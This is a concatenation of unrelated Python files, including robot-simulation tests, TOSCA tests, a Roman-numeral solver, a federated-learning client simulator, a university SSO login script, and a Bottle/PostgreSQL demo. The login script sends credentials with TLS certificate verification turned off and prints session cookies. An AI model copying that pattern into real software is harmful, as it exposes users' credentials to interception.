    block_type = [t for t in env.types if t.name == "block"][0]
    robot_type = [t for t in env.types if t.name == "robot"][0]
    block0 = block_type("block0")
    block1 = block_type("block1")
    block2 = block_type("block2")
    task = env.get_train_tasks()[0]
    state = task.init
    atoms = utils.abstract(state, env.predicates)
    robot = None
    for item in state:
        if item.type == robot_type:
            robot = item
            break
    assert robot is not None
    # Check robot is not next to any door
    with pytest.raises(RuntimeError):
        env._get_door_next_to(state)  # pylint: disable=protected-access
    # Test failure case for _get_region_in() helper
    with pytest.raises(RuntimeError):
        env._get_region_in(state, 150)  # pylint: disable=protected-access
    # block1 is on block0 is on the table, block2 is on the table
    assert OnTable([block0]) in atoms
    assert OnTable([block1]) not in atoms
    assert OnTable([block2]) in atoms
    assert On([block1, block0]) in atoms
    # NOTE(review): each action below is a 5-D vector; the meaning of the
    # components is defined inside PlayroomEnv and is not visible here.
    # No block at this pose, pick fails
    act = Action(np.array([19, 19, 0.45, -0.75, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    # Object not clear, pick fails
    act = Action(np.array([12.2, 11.8, 0.45, 0.35, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    # Cannot putontable or stack without picking first
    act = Action(np.array([12.2, 11.8, 5, 0.35, 0.7]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    act = Action(np.array([19, 14, 0.45, 0.95, 0.8]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    # Perform valid pick
    act = Action(np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    assert not np.allclose(state[block2], next_state[block2])
    state = next_state
    atoms = utils.abstract(state, env.predicates)
    assert OnTable([block2]) not in atoms
    # Cannot pick twice in a row
    act = Action(np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Cannot stack onto non-clear block
    act = Action(np.array([12.2, 11.8, 0.8, 0.35, 0.7]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    # Cannot stack onto no block
    act = Action(np.array([15, 16, 0.8, -0.5, 0.7]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    # Cannot stack onto yourself
    act = Action(np.array([11.8, 18, 1.5, -0.15, 0.7]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Cannot put on table when not clear
    act = Action(np.array([12.2, 11.8, 0.5, 0.35, 0.7]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    # Cannot move to invalid location
    act = Action(np.array([40, 5, 0, 0, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Cannot move to not be next to a door, table, or dial
    act = Action(np.array([5, 5, 0, 0, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
def test_playroom_simulate_blocks():
    """Tests for the cases where simulate() allows the robot to interact with
    blocks."""
    utils.reset_config({"env": "playroom"})
    env = PlayroomEnv()
    block_type = [t for t in env.types if t.name == "block"][0]
    robot_type = [t for t in env.types if t.name == "robot"][0]
    block1 = block_type("block1")
    block2 = block_type("block2")
    task = env.get_train_tasks()[0]
    state = task.init
    robot = None
    for item in state:
        if item.type == robot_type:
            robot = item
            break
    assert robot is not None
    # NOTE(review): the state is threaded through each step below
    # (state = next_state), so the order of actions matters.
    # Move to boring room door
    act = Action(np.array([29.6, 15, 1, 1, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    state = next_state
    # Move to table but do not pick block 1
    act = Action(np.array([12, 11.8, 0.95, 0.35, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    assert np.allclose(state[block1], next_state[block1])
    state = next_state
    # Perform valid pick of block 1 (do not have to face the block)
    act = Action(np.array([12, 11.8, 0.95, -0.35, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    assert not np.allclose(state[block1], next_state[block1])
    state = next_state
    # Perform valid put on table
    act = Action(np.array([19, 14, 0.45, 0.95, 0.8]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[block1], next_state[block1])
    state = next_state
    # Perform valid pick of block 2
    act = Action(np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    assert not np.allclose(state[block2], next_state[block2])
    state = next_state
    # Perform valid stack
    act = Action(np.array([12.2, 11.8, 5, 0.35, 0.7]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[block2], next_state[block2])
    state = next_state
def test_playroom_simulate_doors_and_dial():
    """Tests for the cases where simulate() allows the robot to interact with
    doors and the dial."""
    utils.reset_config({"env": "playroom"})
    env = PlayroomEnv()
    door_type = [t for t in env.types if t.name == "door"][0]
    robot_type = [t for t in env.types if t.name == "robot"][0]
    dial_type = [t for t in env.types if t.name == "dial"][0]
    door1 = door_type("door1")
    door6 = door_type("door6")
    task = env.get_train_tasks()[0]
    state = task.init
    robot = None
    dial = None
    for item in state:
        if item.type == robot_type:
            robot = item
        if item.type == dial_type:
            dial = item
    assert robot is not None
    assert dial is not None
    # NOTE(review): the state is threaded step-by-step below, so the order
    # of actions matters; action vectors are opaque PlayroomEnv inputs.
    # Move to boring room door but do not open it
    act = Action(np.array([29.8, 15, 3, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
    state = next_state
    # Open boring room door
    act = Action(np.array([29.8, 15, 3, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[door1], next_state[door1])
    state = next_state
    # Cannot move directly to playroom even though doors are all open
    act = Action(np.array([125, 15, 1, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Move to playroom
    actions = [
        np.array([30.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([49.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([50.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([59.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([60.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([79.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([80.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([99.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([100.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([109.8, 15, 3, 0, 1]).astype(np.float32),
    ]
    for arr in actions:
        act = Action(arr)
        next_state = env.simulate(state, act)
        assert not np.allclose(state[robot], next_state[robot])
        for o in state:
            if o.type != robot_type:
                assert np.allclose(
                    state[o], next_state[o]
                ), f"obj {o} in state {state} and \nnext state {next_state}"
        state = next_state
    # Can't directly move through door6 to the dial
    act = Action(np.array([126, 15, 1, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Advance through door6
    act = Action(np.array([110.2, 15, 3, 0.5, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[robot], next_state[robot])
    state = next_state
    # Can't directly move left through door6 and end next to door5
    act = Action(np.array([100.3, 15, 3, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Shut door to playroom
    act = Action(np.array([110.2, 15, 3, 1, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[door6], next_state[door6])
    state = next_state
    # Cannot advance through closed door
    act = Action(np.array([109.6, 15, 3, 1, 1]).astype(np.float32))
    with pytest.raises(utils.EnvironmentFailure):
        next_state = env.simulate(state, act)
    # Move to dial but do not toggle it
    act = Action(np.array([125, 15.1, 1, -0.5, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    for o in state:
        if o.type != robot_type:
            assert np.allclose(state[o], next_state[o])
        else:
            assert not np.allclose(state[o], next_state[o])
    state = next_state
    # Cannot move from dial into region 6
    act = Action(np.array([109.7, 15, 3, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert state.allclose(next_state)
    # Turn dial on, facing S (can toggle when not facing dial)
    act = Action(np.array([125, 14.9, 1, -0.5, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[dial], next_state[dial])
    state = next_state
    # Turn dial off, facing E
    act = Action(np.array([125, 15, 1, 0, 1]).astype(np.float32))
    next_state = env.simulate(state, act)
    assert not np.allclose(state[dial], next_state[dial])
    state = next_state
    # Turn dial on, facing N
    act = Action(np.array([125, 14.9, 1, 0.5, 1]).astype(np.float32))
    state = env.simulate(state, act)
    # Turn dial off, facing W
    act = Action(np.array([125.1, 15, 1, 1, 1]).astype(np.float32))
    state = env.simulate(state, act)
def test_playroom_options():
    """Tests for predicate option policies."""
    utils.reset_config({"env": "playroom"})
    env = PlayroomEnv()
    robot_type = [t for t in env.types if t.name == "robot"][0]
    block_type = [t for t in env.types if t.name == "block"][0]
    door_type = [t for t in env.types if t.name == "door"][0]
    dial_type = [t for t in env.types if t.name == "dial"][0]
    region_type = [t for t in env.types if t.name == "region"][0]
    On = [p for p in env.predicates if p.name == "On"][0]
    OnTable = [p for p in env.predicates if p.name == "OnTable"][0]
    Clear = [p for p in env.predicates if p.name == "Clear"][0]
    LightOn = [p for p in env.predicates if p.name == "LightOn"][0]
    robot = robot_type("robby")
    block0 = block_type("block0")
    block1 = block_type("block1")
    block2 = block_type("block2")
    door1 = door_type("door1")
    door2 = door_type("door2")
    door3 = door_type("door3")
    door4 = door_type("door4")
    door5 = door_type("door5")
    door6 = door_type("door6")
    dial = dial_type("dial")
    region1 = region_type("region1")
    region2 = region_type("region2")
    region3 = region_type("region3")
    region4 = region_type("region4")
    region5 = region_type("region5")
    region6 = region_type("region6")
    region7 = region_type("region7")
    task = env.get_train_tasks()[0]
    state = task.init
    # Run through a specific plan of options.
    Pick = [o for o in env.options if o.name == "Pick"][0]
    Stack = [o for o in env.options if o.name == "Stack"][0]
    PutOnTable = [o for o in env.options if o.name == "PutOnTable"][0]
    MoveToDoor = [o for o in env.options if o.name == "MoveToDoor"][0]
    MoveDoorToDial = [o for o in env.options if o.name == "MoveDoorToDial"][0]
    OpenDoor = [o for o in env.options if o.name == "OpenDoor"][0]
    CloseDoor = [o for o in env.options if o.name == "CloseDoor"][0]
    TurnOnDial = [o for o in env.options if o.name == "TurnOnDial"][0]
    TurnOffDial = [o for o in env.options if o.name == "TurnOffDial"][0]
    # NOTE(review): the continuous parameters passed to ground() below are
    # option-specific offsets whose semantics live in PlayroomEnv.
    plan = [
        Pick.ground([robot, block1], [0.35]),
        PutOnTable.ground([robot], [0.1, 0.5, 0.0]),  # put block1 on table
        Pick.ground([robot, block2], [-0.15]),
        # stack block2 on block1
        Stack.ground([robot, block1], [0.0]),
        MoveToDoor.ground([robot, region1, door1], [-0.2, 0.0, 0.0]),
        OpenDoor.ground([robot, door1], [-0.2, 0.0, 0.0, 0.0]),
        # advance through door1
        MoveToDoor.ground([robot, region1, door1], [0.4, 0.0, 0.0]),
        # move to door2
        MoveToDoor.ground([robot, region2, door2], [-0.4, 0.0, 0.0]),
        # etc.
        MoveToDoor.ground([robot, region2, door2], [0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region3, door3], [-0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region3, door3], [0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region4, door4], [-0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region4, door4], [0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region5, door5], [-0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region5, door5], [0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region6, door6], [-0.3, 0.0, 0.0]),
        MoveToDoor.ground([robot, region6, door6], [0.3, 0.0, 0.0]),
        CloseDoor.ground([robot, door6], [0.2, 0.0, 0.0, 1.0]),
        MoveDoorToDial.ground([robot, region7, dial], [-1.0, 0.0, 0.0]),
        TurnOffDial.ground([robot, dial], [0.0, -0.2, 0.0, 0.5]),
        TurnOnDial.ground([robot, dial], [-0.2, 0.0, 0.0, 0.0])
    ]
    assert plan[0].initiable(state)
    policy = utils.option_plan_to_policy(plan)
    # Here's an example of how to make a video within this test.
    # monitor = utils.SimulateVideoMonitor(task, env.render_state)
    # traj = utils.run_policy_with_simulator(policy,
    #                                        env.simulate,
    #                                        task.init,
    #                                        lambda _: False,
    #                                        max_num_steps=len(plan),
    #                                        monitor=monitor)
    # Uncomment to save the video.
    # video = monitor.get_video()
    # outfile = "hardcoded_options_playroom.mp4"
    # utils.save_video(outfile, video)
    traj = utils.run_policy_with_simulator(policy,
                                           env.simulate,
                                           task.init,
                                           task.goal_holds,
                                           max_num_steps=len(plan))
    final_atoms = utils.abstract(traj.states[-1], env.predicates)
    assert LightOn([dial]) in final_atoms
    assert OnTable([block1]) in final_atoms
    assert On([block2, block1]) in final_atoms
    assert Clear([block0]) in final_atoms
    assert Clear([block1]) not in final_atoms
    assert Clear([block2]) in final_atoms
def test_playroom_action_sequence_video():
    """Test to sanity check rendering."""
    utils.reset_config({"env": "playroom"})
    env = PlayroomEnv()
    # Run through a specific plan of low-level actions.
    # NOTE(review): each action is a 5-D vector; component semantics are
    # defined inside PlayroomEnv and are not visible in this file.
    task = env.get_train_tasks()[0]
    action_arrs = [
        # Pick up a block
        np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32),
        # Stack block
        np.array([12.2, 11.8, 2, 0.35, 1]).astype(np.float32),
        # Move to door1
        np.array([29.6, 16, 3, 0, 1]).astype(np.float32),
        # Open door1
        np.array([29.8, 15, 3, 0, 1]).astype(np.float32),
        # Move down hallway to playroom
        np.array([30.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([49.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([50.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([59.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([60.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([79.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([80.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([99.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([100.3, 15, 3, 0, 1]).astype(np.float32),
        np.array([109.8, 15, 3, 0, 1]).astype(np.float32),
        np.array([110.2, 15, 3, 0.5, 1]).astype(np.float32),
        # Shut playroom door
        np.array([110.2, 15, 3, -1, 1]).astype(np.float32),
        # Move to dial
        np.array([127, 15, 1, -1, 1]).astype(np.float32),
        # Turn dial on
        np.array([125, 15.1, 1, -0.5, 1]).astype(np.float32),
    ]
    policy = utils.action_arrs_to_policy(action_arrs)
    traj = utils.run_policy_with_simulator(policy,
                                           env.simulate,
                                           task.init,
                                           task.goal_holds,
                                           max_num_steps=len(action_arrs))
    # Render a state where we're grasping
    env.render_state(traj.states[1], task)
    # Render end state with open and closed doors
    env.render_state(traj.states[-1], task, caption="caption")
|
import unittest
from toscalib.templates.topology import ToscaTopology
from tests.utils.test_utils import init_template
class TestTopologyTemplateMethods(unittest.TestCase):
    """Unit tests for ToscaTopology substitution parsing and output prep."""
    def test_update_mapping_template_pointer(self):
        """Parsing a substitution section must point the substituted node
        type's mapping_template back at this template."""
        template = init_template()
        sub_sec = {'node_type': 'substituteNodeType', 'capabilities': {'substituteCapability': ['nodeName', 'capabilityName']}}
        sub_type = template.db.NODE_TYPES.get('substituteNodeType')
        self.assertIsNone(sub_type.mapping_template)
        template._parse_substitution(template.db, sub_sec)
        self.assertIsNotNone(sub_type.mapping_template)
        self.assertEqual(sub_type.mapping_template, template)
    def test_parse_substitution(self):
        """Parsing a section with one requirement and one capability mapping
        must record the sub_type and produce three sub_rules."""
        template = init_template()
        sub_sec = {'node_type': 'substituteNodeType', 'requirements': {'substituteRequirement': ['node2', 'dummyRequirement']}, 'capabilities': {'substituteCapability': ['nodeName', 'capabilityName']}}
        self.assertIsNone(template.sub_type)
        self.assertEqual(len(template.sub_rules), 0)
        template._parse_substitution(template.db, sub_sec)
        self.assertEqual(template.sub_type, 'substituteNodeType')
        # NOTE(review): 3 rules from 2 mappings — presumably one extra rule
        # is generated internally; confirm against _parse_substitution.
        self.assertEqual(len(template.sub_rules), 3)
    def test_prepare_output(self):
        """_prepare_output must emit YAML-ordering-prefixed dicts for both an
        empty topology and the populated fixture template."""
        template = ToscaTopology('topoName')
        res = template._prepare_output()
        self.assertEqual(res, {'00_YAMLORDER_tosca_definitions_version': 'tosca_simple_yaml_1_0_0', '14_YAMLORDER_topology_template': {}})
        template = init_template()
        res = template._prepare_output()
        self.assertEqual(res, {'00_YAMLORDER_tosca_definitions_version': 'tosca_simple_yaml_1_0_0', '14_YAMLORDER_topology_template': {'11_YAMLORDER_inputs': {'inputName': {'00_YAMLORDER_type': 'string'}},
        '13_YAMLORDER_node_templates': {'node2': {'00_YAMLORDER_type': 'nodeTypeName', '01_YAMLORDER_properties': {'propertyName': None},'05_YAMLORDER_requirements': [{'dummyRequirement': 'nodeName'}]},
        'nodeName': {'00_YAMLORDER_type': 'nodeTypeName', '01_YAMLORDER_properties': {'propertyName': None}}}}})
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from pypinyin.style._tone_convert import ( # noqa
to_normal,
to_tone,
to_tone2,
to_tone3,
to_initials,
to_finals,
to_finals_tone,
to_finals_tone2,
to_finals_tone3,
tone_to_normal,
tone_to_tone2,
tone_to_tone3,
tone2_to_normal,
tone2_to_tone,
tone2_to_tone3,
tone3_to_normal,
tone3_to_tone,
tone3_to_tone2,
# 向后兼容
_improve_tone3,
_get_number_from_pinyin,
_v_to_u,
_fix_v_u,
_re_number,
) # noqa
|
#
# @lc app=leetcode id=13 lang=python3
#
# [13] Roman to Integer
#
class Solution:
    def romanToInt(self, s: str) -> int:
        """Convert a Roman numeral string to its integer value.

        Scans right-to-left, adding each symbol's value and compensating
        afterwards for the subtractive pairs (IV/IX, XL/XC, CD/CM).
        """
        values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
        # For each symbol that can be subtractive: the symbols it may
        # precede, and twice its value (it was added once above, so it
        # must be removed twice to net a subtraction).
        subtractive = {"I": ("VX", 2), "X": ("LC", 20), "C": ("DM", 200)}
        total = 0
        following = "a"  # sentinel that matches no subtractive pair
        for symbol in reversed(s):
            total += values[symbol]
            pair = subtractive.get(symbol)
            if pair is not None and following in pair[0]:
                total -= pair[1]
            following = symbol
        return total
|
#!/usr/bin/python3
from jk_keyvaluestore import DirBasedKeyValueStore
# Smoke-test script for DirBasedKeyValueStore: open the "data" store,
# write a key, list keys before and after removal, and flush to disk.
# NOTE(review): the meaning of the second constructor argument (1) is not
# visible here — confirm against the jk_keyvaluestore documentation.
ds = DirBasedKeyValueStore("data", 1)
ds.synchronize()
ds.put("somekey", [ "a", 1 ])
print(ds.keys())  # expected to include "somekey"
ds.remove("somekey")
print(ds.keys())  # "somekey" should now be gone
ds.synchronize()
|
#!/usr/bin/env python
"""Packaging script for the netandloc helper library."""
from setuptools import setup, find_packages

setup(name='netandloc',
      version='1.0',
      description='Python Library To facilitate the manipulation of datasets from OR_NETWORK_AND_DISCRETE_LOCATION',
      author='xNok',
      author_email='nokwebspace@gmail.com',
      url='https://github.com/xNok/OR_NETWORK-AND-DISCRETE-LOCATION',
      # Automatically include every package under the project root.
      packages=find_packages(),
      )
import os
import pickle
from abc import ABC, abstractmethod
import numpy as np
class BaseSim(ABC):
    """Abstract interface for a simulated federated-learning client."""

    @abstractmethod
    def is_active(self, cur_time):
        """Return True if the client is online at simulation time cur_time."""
        pass

    @abstractmethod
    def get_completion_time(self, model_size):
        """Return the time needed to train and exchange a model of model_size."""
        pass

    def active_till_the_end(self, cur_time, model_size):
        """Return whether the client stays online until the round finishes.

        The base implementation is a no-op (returns None); subclasses
        override it with a real check.
        """
        pass
class ClientSim(BaseSim):
    """Availability/latency model for one client, driven by a recorded trace.

    The trace is assumed to hold parallel 'active'/'inactive' timestamp
    lists describing online intervals, plus a 'finish_time' period after
    which the trace repeats — TODO confirm the trace schema.
    """

    def __init__(self, trace, speed, args):
        self.trace = trace
        # Per-device capacities: computation speed and network bandwidth.
        self.compute_speed = speed['computation']
        self.bandwidth = speed['communication']
        self.args = args
        # Index of the current active/inactive interval; advanced lazily
        # as is_active() is queried with increasing times.
        self.behavior_index = 0

    def is_active(self, cur_time):
        """Return True if the trace marks the client online at cur_time."""
        # Wrap the query time into one trace period.
        norm_time = cur_time % self.trace['finish_time']
        # Advance behavior_index until its interval can contain norm_time.
        while norm_time > self.trace['inactive'][self.behavior_index]:
            # Guard against looping forever when norm_time lies beyond the
            # last recorded inactive boundary.
            if self.behavior_index == 0 and norm_time > self.trace['inactive'][-1]:
                break
            self.behavior_index += 1
            self.behavior_index %= len(self.trace['active'])
        if self.trace['active'][self.behavior_index] <= norm_time <= self.trace['inactive'][self.behavior_index]:
            return True
        return False

    def active_till_the_end(self, cur_time, model_size):
        """Return True if the client stays online until the round completes."""
        if not self.is_active(cur_time):
            return False
        end_time = cur_time + self.get_completion_time(model_size)
        norm_time = cur_time % self.trace['finish_time']
        end_norm = end_time % self.trace['finish_time']
        # If the round wraps past the end of the trace period, unwrap so it
        # can be compared against the current inactive boundary.
        if end_norm < norm_time:
            end_norm = end_norm + self.trace['finish_time']
        if end_norm <= self.trace['inactive'][self.behavior_index]:
            return True
        return False

    def get_completion_time(self, model_size):
        """Estimate computation + communication time for one training round.

        The constants 3 and 2 are presumably calibration factors (e.g.
        forward/backward cost and up+down transfer) — TODO confirm their
        provenance.
        """
        return 3 * self.args.batch_size * self.args.epochs * float(self.compute_speed) / 1000 \
            + 2 * model_size / float(self.bandwidth)
def load_sim_data(aggregator_args):
    """Build one ClientSim per client according to the requested distribution.

    Loads the pickled behavior traces and device capacities shipped next
    to this module, plus an availability ranking of clients ordered from
    least to most available.
    """
    script_dir = os.path.dirname(__file__)
    with open(os.path.join(script_dir, 'client_behave_trace'), 'rb') as tr:
        trace_data = list(pickle.load(tr).values())
    with open(os.path.join(script_dir, 'client_device_capacity'), 'rb') as cp:
        capacity_data = list(pickle.load(cp).values())
    # Client indices sorted worst-to-best by availability.
    worst_to_best = list(np.load(os.path.join(script_dir, 'avail_worst_to_best.npy')))
    client_sim_data = []
    if aggregator_args.trace_distro == 'random':
        indices = range(aggregator_args.client_num_in_total)
    elif aggregator_args.trace_distro == 'high_avail':
        # 60% of clients from the best-available end, 20% from the worst.
        indices = distribute(.6, .2, aggregator_args, worst_to_best)
    elif aggregator_args.trace_distro == 'low_avail':
        indices = distribute(.2, .6, aggregator_args, worst_to_best)
    elif aggregator_args.trace_distro == 'average':
        indices = distribute(.2, .2, aggregator_args, worst_to_best)
    else:
        raise AttributeError(
            'Invalid trace_distro. Possible options: {}'.format('"random" or "high_avail" or "low_avail" or "average"'))
    for client_id in indices:
        # Wrap around when there are more clients than recorded
        # traces/capacities.
        client_sim = ClientSim(
            trace_data[client_id % len(trace_data)],
            capacity_data[client_id % len(capacity_data)],
            aggregator_args
        )
        client_sim_data.append(client_sim)
    return client_sim_data
def distribute(high, low, args, worst_to_best):
    """Pick client indices: a `high` fraction from the best-available end,
    a `low` fraction from the worst end, and the remainder from the middle.

    Args:
        high: fraction of clients to take from the most-available end.
        low: fraction of clients to take from the least-available end.
        args: aggregator arguments; only `client_num_in_total` is read.
        worst_to_best: client indices ordered from least to most available.

    Returns:
        A list of exactly ``args.client_num_in_total`` indices.
    """
    n = len(worst_to_best)
    best_count = int(np.round(high * args.client_num_in_total))
    worst_count = int(np.round(low * args.client_num_in_total))
    mid_count = args.client_num_in_total - best_count - worst_count
    # Centre the middle slice on the median availability rank.
    start = int(np.round(n / 2 - mid_count / 2))
    # Use an explicit start index instead of a negative slice: the original
    # `worst_to_best[-best_count:]` returned the ENTIRE list when
    # best_count was 0, inflating the result.
    return (worst_to_best[:worst_count]
            + worst_to_best[n - best_count:]
            + worst_to_best[start:start + mid_count])
|
from pylevel.tests.test_putget import * # noqa
|
import requests
import re
import os
import time
requests.packages.urllib3.disable_warnings()
class ZJUHealthReport():
    """Logs in to the ZJU SSO portal to obtain health-report session cookies."""

    def __init__(self, user, passwd):
        self.session = requests.Session()
        if self.login(user,passwd):
            # Dump the session cookies so they can be reused by a caller.
            print(str(requests.utils.dict_from_cookiejar(self.session.cookies)))
        else:
            print('登陆失败')

    def login(self, user, passwd):
        """Authenticate against the CAS endpoint; return True on success.

        The password is RSA-encrypted with the server-provided public key
        (textbook RSA on the raw ASCII bytes, hex-encoded and left-padded
        to 128 hex digits) before being posted back to the login form.
        """
        login_url = 'https://zjuam.zju.edu.cn/cas/login?service=https%3A%2F%2Fhealthreport.zju.edu.cn%2Fa_zju%2Fapi%2Fsso%2Findex%3Fredirect%3Dhttps%253A%252F%252Fhealthreport.zju.edu.cn%252Fncov%252Fwap%252Fdefault%252Findex'
        res = self.session.get(url=login_url, verify=False)
        # CAS embeds a one-time "execution" token in the login form; it
        # must be echoed back with the credentials.
        execution = re.search('name="execution" value="(.*?)"', res.text).group(1)
        res = self.session.get(url='https://zjuam.zju.edu.cn/cas/v2/getPubKey', verify=False).json()
        M_str, e_str = res['modulus'], res['exponent']
        password_bytes = bytes(passwd, 'ascii')
        password_int = int.from_bytes(password_bytes, 'big')
        e_int = int(e_str, 16)
        M_int = int(M_str, 16)
        # RSA encryption: c = m^e mod M.
        result_int = pow(password_int, e_int, M_int)
        encrypt_password = hex(result_int)[2:].rjust(128, '0')
        data = {
            'username': user,
            'password': encrypt_password,
            'execution': execution,
            '_eventId': 'submit'
        }
        res = self.session.post(url=login_url, data=data, verify=False)
        res.encoding = "utf-8"
        # If the response still shows the SSO login page, auth failed.
        if '统一身份认证' in res.text:
            return False
        return True
# Script entry point. Replace the placeholders with real credentials.
if __name__ == '__main__':
    usr = r'XXX'
    pwd = r'XXX'  # unified-authentication (SSO) account and password
    try:
        # The original passed an undefined third argument `ua`, which
        # always raised NameError; ZJUHealthReport takes (user, passwd).
        DK = ZJUHealthReport(usr, pwd)
    except Exception as e:
        print(str(e))
|
"""Methods for downloading, parsing, and analyzing GOES Level 2 Wildfire data.
Full Scans of Fire for GOES-17
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes17/ABI-L2-FDCF/?region=us-east-1&tab=overview
CONUS Scans of Fire for GOES-17
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes17/ABI-L2-FDCC/?region=us-east-1&tab=overview
Full Scans of Fire for GOES-16
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes16/ABI-L2-FDCF/?region=us-east-1&tab=overview
CONUS Scans of Fire for GOES-16
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes16/ABI-L2-FDCC/?region=us-east-1&tab=overview
"""
from .utilities import *
from .downloader import *
|
# -*- coding: utf-8 -*-
from django.db import models
class Document(models.Model):
    """A single user-uploaded file stored under MEDIA_ROOT/documents/."""
    # FileField joins upload_to with forward slashes on every storage
    # backend, so use '/' instead of the original Windows backslash.
    upload_to = 'documents/'
    # Pass upload_to by keyword: FileField's first positional parameter is
    # verbose_name, so the original positional call never set upload_to.
    docfile = models.FileField(upload_to=upload_to)
__author__ = 'spousty'
import psycopg2
from bottle import route, run, get, DEBUG
import os
@route('/')
def index():
    """Liveness page; performs no database access."""
    return "<h1> hello OpenShift Ninja without DB</h1>"
# since this is a read only talk to the replicas
@get('/db')
def dbexample():
    """Query ten park points from the read replica and render them as HTML."""
    print(os.environ.get('POSTGRESQL_USER'))
    print("After Env")
    try:
        conn = psycopg2.connect(database=os.environ.get('PG_DATABASE'), user=os.environ.get('PG_USER'), host=os.environ.get('PG_SLAVE_RC_DC_SERVICE_HOST'), password=os.environ.get('PG_ROOT_PASSWORD'))
    except psycopg2.Error as exc:
        # The original bare `except` printed and then fell through to use
        # an undefined `conn`, raising NameError; report the failure and
        # stop instead.
        print(os.environ.get('PG_USER') + " " + os.environ.get('PG_SLAVE_RC_DC_SERVICE_HOST'))
        return "<h2>Database connection failed: " + str(exc) + "</h2>"
    cur = conn.cursor()
    cur.execute("""select parkid, name, ST_AsText(the_geom) from parkpoints limit 10""")
    rows = cur.fetchall()
    result_string = "<h2>Here are your results: </h2>"
    for row in rows:
        result_string += "<h3>" + str(row[0]) + ", " + str(row[1]) + ", " + str(row[2]) + "</h3>"
    cur.close()
    conn.close()
    return result_string
if __name__ == '__main__':
    # Development server; OpenShift routes external traffic to port 8080.
    run(host='0.0.0.0', port=8080, debug=True)
|
from __future__ import print_function, division
import unittest, numpy as np
from pyscf import gto, tddft, scf
from pyscf.nao import bse_iter
from pyscf.nao import polariz_inter_ave, polariz_nonin_ave
# Build a beryllium atom with a cc-pVDZ basis and converge a mean-field
# (RHF) reference used by the BSE test below.
mol = gto.M( verbose = 1, atom = '''Be 0 0 0;''', basis = 'cc-pvdz',)
gto_mf = scf.RHF(mol)
gto_mf.kernel()

class KnowValues(unittest.TestCase):
    def test_bse_gto_vs_nao_nonin_0081(self):
        """ Non-interacting case """
